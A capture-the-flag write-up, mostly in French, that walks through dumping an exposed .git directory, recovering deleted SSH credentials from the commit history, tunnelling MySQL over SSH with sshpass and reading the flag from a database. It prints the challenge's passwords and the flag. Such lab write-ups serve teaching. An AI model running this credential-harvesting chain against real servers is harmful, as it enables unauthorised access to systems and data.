Ce serveur écoute sur 2 ports ! 443 et 222. Trouvez un moyen d'obtenir le flag.
This server listen on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh
Auteur : Penthium2 (BZHack)
On trouve un repo git sur le webserver :
$ curl https://gishadb.flag4all.sh/.git/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /.git</title>
</head>
<body>
<h1>Index of /.git</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="COMMIT_EDITMSG">COMMIT_EDITMSG</a></td><td align="right">2023-05-25 12:53 </td><td align="right"> 24 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="HEAD">HEAD</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> 23 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="branches/">branches/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="config">config</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> 92 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="description">description</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> 73 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="hooks/">hooks/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="index">index</a></td><td align="right">2023-05-25 12:53 </td><td align="right">217 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="info/">info/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="logs/">logs/</a></td><td align="right">2023-05-25 12:44 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="objects/">objects/</a></td><td align="right">2023-05-25 12:53 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="refs/">refs/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.56 (Debian) Server at gishadb.flag4all.sh Port 80</address>
</body></html>
Alors on le recupere.
$ git-dumper https://gishadb.flag4all.sh/ git
$ cd git
$ git log
commit cfdccf9472e0b985abc372f90fa64352d744b5ad (HEAD -> master)
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:53:28 2023 +0200
suppresion info preprod
commit 13c0faef33bf466602913bc3918094cfefea072f
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:52:44 2023 +0200
ajout info ssh pour preprod
commit 6dbcaf8c22bbe74aa2562ac60f58602d8592347a
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:50:32 2023 +0200
sécurisation
commit 02ef7e50a0bb9954d7819f8fd7c7b2c593db0d73
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:44:03 2023 +0200
ipremier commit
(END)
$ git diff 13c0faef33bf466602913bc3918094cfefea072f
diff --git a/info_login b/info_login
deleted file mode 100644
index d904e9b..0000000
--- a/info_login
+++ /dev/null
@@ -1,2 +0,0 @@
-loginssh : gishadb@192.168.124.1
-pass : iop
En essayant de se login via ssh on se fait spam le terminal..
Alors on va local port forward mysql vers notre loopback et continuer a enumerer avec les credentials trouvé dans config.php
<?php
$cnx = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8', 'app', 'db_Super_P4$$');
?>
Pane 1:
sshpass -p 'iop' ssh -p 222 -L 3306:127.0.0.1:3306 -N gishadb@gishadb.flag4all.sh
Pane 2:
$ mysql -h 127.0.0.1 -u app -p app
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 47176
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [app]> show tables;
+---------------+
| Tables_in_app |
+---------------+
| hand |
| users |
+---------------+
2 rows in set (0.018 sec)
MariaDB [app]> select * from users;
+----+----------+-----------+-----------------------+
| id | lastname | firstname | email |
+----+----------+-----------+-----------------------+
| 1 | Deux | Penthium | penthium2@flag4all.sh |
+----+----------+-----------+-----------------------+
1 row in set (0.016 sec)
MariaDB [app]> select * from hand;
+----+-----------------------------+----------+
| id | finger | ring |
+----+-----------------------------+----------+
| 1 | pouce | Penthium |
| 2 | index | Penthium |
| 3 | FLAG{TAK3_Care_Of_SSH_POWA} | Penthium |
| 4 | anulaire | Penthium |
| 5 | oriculaire | Penthium |
+----+-----------------------------+----------+
5 rows in set (0.016 sec)
MariaDB [app]>
ggwp